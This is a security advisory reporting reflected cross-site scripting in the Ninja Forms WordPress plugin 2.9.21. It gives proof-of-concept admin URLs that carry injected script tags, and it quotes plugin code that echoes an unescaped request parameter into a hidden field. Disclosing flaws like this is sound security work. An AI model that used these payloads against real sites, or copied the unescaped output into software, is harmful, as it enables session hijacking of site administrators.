Title: WordPress 'Ninja Forms' Plugin - XSS Version: 2.9.21 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/07/14 Download: https://wordpress.org/plugins/ninja-forms/ Contacted authors: 2015/07/14 ========================================================== ## Description: ========================================================== Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site. ## Reflected XSS: ========================================================== Certain parameters are used unsanitized in the admin pages. PoC: Log in as admin and visit one of the following URLs: [URL]/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script> [URL]/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script> [URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>&notification-action=new It looks like there are more vulnerabilities, since the plugin has code like this: file: subs-cpt.php ... l.883 if ( isset ( $_REQUEST['ref'] ) ) { l.884 $ref = $_REQUEST['ref']; l.885 } else if ( get_transient( 'nf_sub_edit_ref' ) ) { l.886 $ref = get_transient( 'nf_sub_edit_ref' ); l.887 } else { l.888 $ref = ''; l.889 } l.890 ?> l.891 <input type="hidden" name="ref" value="<?php echo $ref; ?>" /> ... ## Solution ========================================================== No fix available.